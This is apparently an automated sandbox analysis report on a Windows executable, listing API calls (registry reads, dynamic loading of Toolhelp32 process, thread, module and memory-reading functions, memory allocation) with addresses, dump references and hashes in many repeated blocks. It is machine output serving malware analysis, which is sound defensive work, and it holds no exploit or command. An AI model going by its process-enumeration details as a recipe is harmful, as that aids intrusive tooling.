                                                • Instruction ID: cc400aaec5f98775912378b72cba36d114b7af17ff567da94c7c96793c6a670b
                                                • Opcode Fuzzy Hash: 983363b32a7dd6747033d111e2c59e60e1eba936680b0ce3877a97b211a9736e
                                                • Instruction Fuzzy Hash: 5BE0C9B2301224BFD300DA5EAC44E9BBBECDFD9365B50C16AB90CC7221D5759C0186B4
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00426CE2
                                                  • Part of subcall function 00426F58: GetModuleFileNameA.KERNEL32(00000000,?,00000105,005080A8), ref: 00426F73
                                                  • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426F91
                                                  • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426FAF
                                                  • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00426FCD
                                                  • Part of subcall function 00426F58: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00427016
                                                  • Part of subcall function 00426F58: RegQueryValueExA.ADVAPI32(?,004271D8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001), ref: 00427034
                                                  • Part of subcall function 00426F58: RegCloseKey.ADVAPI32(?,00427063,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00427056
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Open$FileModuleNameQueryValue$Close
                                                • String ID:
                                                • API String ID: 2796650324-0
                                                • Opcode ID: d03d703cfcffe0b58514ef675141cf11ad548282fe492436df931db8b4e2f126
                                                • Instruction ID: 33c73a500caeb01f155e44840a867e4305e698149c574fd086c8c5f59709d573
                                                • Opcode Fuzzy Hash: d03d703cfcffe0b58514ef675141cf11ad548282fe492436df931db8b4e2f126
                                                • Instruction Fuzzy Hash: D0E06D71A002249BCB10EE5C99C1A4733D8AF08754F4105A6BCA8CF34AD3B5DD1087E4
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00426CE2
                                                  • Part of subcall function 00426F58: GetModuleFileNameA.KERNEL32(00000000,?,00000105,005080A8), ref: 00426F73
                                                  • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426F91
                                                  • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,005080A8), ref: 00426FAF
                                                  • Part of subcall function 00426F58: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00426FCD
                                                  • Part of subcall function 00426F58: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00427016
                                                  • Part of subcall function 00426F58: RegQueryValueExA.ADVAPI32(?,004271D8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,0042705C,?,80000001), ref: 00427034
                                                  • Part of subcall function 00426F58: RegCloseKey.ADVAPI32(?,00427063,00000000,?,?,00000000,0042705C,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00427056
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Open$FileModuleNameQueryValue$Close
                                                • String ID:
                                                • API String ID: 2796650324-0
                                                • Opcode ID: d03d703cfcffe0b58514ef675141cf11ad548282fe492436df931db8b4e2f126
                                                • Instruction ID: 33c73a500caeb01f155e44840a867e4305e698149c574fd086c8c5f59709d573
                                                • Opcode Fuzzy Hash: d03d703cfcffe0b58514ef675141cf11ad548282fe492436df931db8b4e2f126
                                                • Instruction Fuzzy Hash: D0E06D71A002249BCB10EE5C99C1A4733D8AF08754F4105A6BCA8CF34AD3B5DD1087E4
                                                APIs
                                                  • Part of subcall function 004CF34C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004CF5D3,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF360
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004CF378
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004CF38A
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004CF39C
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004CF3AE
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004CF3C0
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004CF3D2
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 004CF3E4
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004CF3F6
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004CF408
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004CF41A
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 004CF42C
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 004CF43E
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 004CF450
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004CF462
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004CF474
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004CF486
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF5D9
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$CreateHandleModuleSnapshotToolhelp32
                                                • String ID:
                                                • API String ID: 2242398760-0
                                                • Opcode ID: aa5b044c588ddfdc3210c4c3c0d3926e160f7f3b193a84c3919e26267408e9fe
                                                • Instruction ID: 2367da90766c253f4fab510a59415ecdd71ebaea341184a550cb27389e70fce3
                                                • Opcode Fuzzy Hash: aa5b044c588ddfdc3210c4c3c0d3926e160f7f3b193a84c3919e26267408e9fe
                                                • Instruction Fuzzy Hash: 14C080A3601520374A1066F53CC4DC34B4DCD451F63144477B505D3213D62D4C1461A4
                                                APIs
                                                  • Part of subcall function 004CF34C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004CF5D3,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF360
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004CF378
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004CF38A
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004CF39C
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004CF3AE
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004CF3C0
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004CF3D2
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 004CF3E4
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004CF3F6
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004CF408
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004CF41A
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 004CF42C
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 004CF43E
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 004CF450
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004CF462
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004CF474
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004CF486
                                                • Process32NextW.KERNEL32(00000000,?), ref: 004CF659
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$HandleModuleNextProcess32
                                                • String ID:
                                                • API String ID: 2237597116-0
                                                • Opcode ID: 8c9a0a4278b6fcd838e880fa5d4eae8115870c90ca26a6c5a323d4618d1d0444
                                                • Instruction ID: f7a2506f4e2c2bd292fd072077a1b2b4fe2edb9bc32b43aa5964b395e8fa5f96
                                                • Opcode Fuzzy Hash: 8c9a0a4278b6fcd838e880fa5d4eae8115870c90ca26a6c5a323d4618d1d0444
                                                • Instruction Fuzzy Hash: F9C080B3301620178F1076F53C84DD34B4DCD491F73040477B505D3212D66D8C046194
                                                APIs
                                                  • Part of subcall function 004CF34C: GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004CF5D3,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF360
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004CF378
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004CF38A
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004CF39C
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004CF3AE
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004CF3C0
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004CF3D2
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32First), ref: 004CF3E4
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004CF3F6
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004CF408
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004CF41A
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32First), ref: 004CF42C
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 004CF43E
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32First), ref: 004CF450
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004CF462
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004CF474
                                                  • Part of subcall function 004CF34C: GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004CF486
                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 004CF639
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$FirstHandleModuleProcess32
                                                • String ID:
                                                • API String ID: 2774106396-0
                                                • Opcode ID: 1b2f9cd772ea828f0587b818af3bf864f9015723f77f16aa6c12ecd14a310dd8
                                                • Instruction ID: cea9194b1bec40b452e46435030e9f6d0a77cd9c208c2d682c677ae1133cc5ba
                                                • Opcode Fuzzy Hash: 1b2f9cd772ea828f0587b818af3bf864f9015723f77f16aa6c12ecd14a310dd8
                                                • Instruction Fuzzy Hash: 81C080A3301530174A1076F53C85DD34F4DCD451F63144477B504D3213D66D8C156294
                                                APIs
                                                • SysFreeString.OLEAUT32(?), ref: 00425BD6
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeString
                                                • String ID:
                                                • API String ID: 3341692771-0
                                                • Opcode ID: 7f1c94e0d7d00539a662d5e416c93b2d65ca24bdfd2f6e8adb07ea5ed58003b8
                                                • Instruction ID: 2e196b39daa8764921be558a5a387240bacd155c0bdd8e0ce52a32d021dcfd8b
                                                • Opcode Fuzzy Hash: 7f1c94e0d7d00539a662d5e416c93b2d65ca24bdfd2f6e8adb07ea5ed58003b8
                                                • Instruction Fuzzy Hash: 60B092B42022106EE6119B21AC40B27362AABC1711FB9898AA8008A128CB7CAC019628
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitThreadUser
                                                • String ID:
                                                • API String ID: 3424019298-0
                                                • Opcode ID: 289ccbf36f7d9a8ccf60a36875ac77a23cf744902269d9c3177fdf0b5915d927
                                                • Instruction ID: 714fdd28892cd0eaf32afc09d448c0a52e529b299e21ce259e2126395e5b38a4
                                                • Opcode Fuzzy Hash: 289ccbf36f7d9a8ccf60a36875ac77a23cf744902269d9c3177fdf0b5915d927
                                                • Instruction Fuzzy Hash:
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitThreadUser
                                                • String ID:
                                                • API String ID: 3424019298-0
                                                • Opcode ID: 289ccbf36f7d9a8ccf60a36875ac77a23cf744902269d9c3177fdf0b5915d927
                                                • Instruction ID: 714fdd28892cd0eaf32afc09d448c0a52e529b299e21ce259e2126395e5b38a4
                                                • Opcode Fuzzy Hash: 289ccbf36f7d9a8ccf60a36875ac77a23cf744902269d9c3177fdf0b5915d927
                                                • Instruction Fuzzy Hash:
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: yymmdd
                                                • API String ID: 0-2871001947
                                                • Opcode ID: c2f0850ca05741d5544196295116c66d8b32a17802d8640e374434aa3ec15c18
                                                • Instruction ID: f15f1b85a0f637e4cae317bac7f6929bfb3b2a163c4115d7559e6a64fae5d6e2
                                                • Opcode Fuzzy Hash: c2f0850ca05741d5544196295116c66d8b32a17802d8640e374434aa3ec15c18
                                                • Instruction Fuzzy Hash: 6951E9B5900208EBDB04DFE4DD98BDEBBB8BF48305F108129F506BB6A0DB745A49CB54
                                                APIs
                                                • VirtualFree.KERNEL32(?,?,00004000), ref: 00422924
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeVirtual
                                                • String ID:
                                                • API String ID: 1263568516-0
                                                • Opcode ID: 324a51b74da253537b253d891f19afd814ae007f76c7ef41f2610dd7fb034b42
                                                • Instruction ID: 90b6aa8fc387ceb18a887af8a54e4aae20ad55db79348811f77ef19120a841c5
                                                • Opcode Fuzzy Hash: 324a51b74da253537b253d891f19afd814ae007f76c7ef41f2610dd7fb034b42
                                                • Instruction Fuzzy Hash: E02100B4204212DFC750CF28D980A5ABBE4FF99310F60496AE994CB310D371E948CF56
                                                APIs
                                                • VirtualFree.KERNEL32(?,?,00004000), ref: 00422924
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeVirtual
                                                • String ID:
                                                • API String ID: 1263568516-0
                                                • Opcode ID: 324a51b74da253537b253d891f19afd814ae007f76c7ef41f2610dd7fb034b42
                                                • Instruction ID: 90b6aa8fc387ceb18a887af8a54e4aae20ad55db79348811f77ef19120a841c5
                                                • Opcode Fuzzy Hash: 324a51b74da253537b253d891f19afd814ae007f76c7ef41f2610dd7fb034b42
                                                • Instruction Fuzzy Hash: E02100B4204212DFC750CF28D980A5ABBE4FF99310F60496AE994CB310D371E948CF56
                                                APIs
                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004229C3), ref: 00422686
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeVirtual
                                                • String ID:
                                                • API String ID: 1263568516-0
                                                • Opcode ID: 247e92d39d1f8c32a233882610808adfe31950c6fd4b9b6067f9f14b00473830
                                                • Instruction ID: dad5cfe4248d8bab246a3d25b008404abdce35bce64d087442e73adda1e8f828
                                                • Opcode Fuzzy Hash: 247e92d39d1f8c32a233882610808adfe31950c6fd4b9b6067f9f14b00473830
                                                • Instruction Fuzzy Hash: DBF02E73B006303BDB20596A5E81B535AC59F95790F950077F948EF3CDD5E98C054399
                                                APIs
                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004229C3), ref: 00422686
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeVirtual
                                                • String ID:
                                                • API String ID: 1263568516-0
                                                • Opcode ID: 247e92d39d1f8c32a233882610808adfe31950c6fd4b9b6067f9f14b00473830
                                                • Instruction ID: dad5cfe4248d8bab246a3d25b008404abdce35bce64d087442e73adda1e8f828
                                                • Opcode Fuzzy Hash: 247e92d39d1f8c32a233882610808adfe31950c6fd4b9b6067f9f14b00473830
                                                • Instruction Fuzzy Hash: DBF02E73B006303BDB20596A5E81B535AC59F95790F950077F948EF3CDD5E98C054399
                                                APIs
                                                • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0056466B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocVirtual
                                                • String ID:
                                                • API String ID: 4275171209-0
                                                • Opcode ID: 3458b433ebb35ab6b83173c0e5f9c4d5c9db5b09a13dfc6663b68e427115ed3f
                                                • Instruction ID: ad2aa484d1772a38b6f3c9364045a751c64e4889beea1b58f91d59234429b9fb
                                                • Opcode Fuzzy Hash: 3458b433ebb35ab6b83173c0e5f9c4d5c9db5b09a13dfc6663b68e427115ed3f
                                                • Instruction Fuzzy Hash: D0E0E2B2300248ABDF24CE8CD884BAB379DB759310F108411FA29D7604C675EC50AB61
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: ,4B
                                                • API String ID: 0-3991844317
                                                • Opcode ID: 8ff27b8217d493c07472fe6b1d30cc509388e0ea78a9f24c628ca7206849fcec
                                                • Instruction ID: 2e62f071ec061e269e0af2fbab426198be3a6a271d82a0366f1eceefab834b83
                                                • Opcode Fuzzy Hash: 8ff27b8217d493c07472fe6b1d30cc509388e0ea78a9f24c628ca7206849fcec
                                                • Instruction Fuzzy Hash: D7D017B23186208FD3406FA9A89462A77F4AB98312F51183EE0C1C2301D63D89449B16
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a83ff5ffc417f83f4d41acb1b4fd39f3d50246cb43ecf1de3bdcce26b5ed6742
                                                • Instruction ID: 32f108f087d7d4630656b8080de6af3654730a431ac790d0d60a92850006a6c2
                                                • Opcode Fuzzy Hash: a83ff5ffc417f83f4d41acb1b4fd39f3d50246cb43ecf1de3bdcce26b5ed6742
                                                • Instruction Fuzzy Hash: 3A81B5B1D00248EBDB04DFE4DE58BDEBBB4BB48305F10852AE612B76A0DB745A45CB58
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dafe4ae703c94027c61682fa393aab4e794a961f154c1b890746c1e944275571
                                                • Instruction ID: 73ee6168823af3f290b0d29e05c2a6dbec2158b3bd084ab17ee3d9878e5a0866
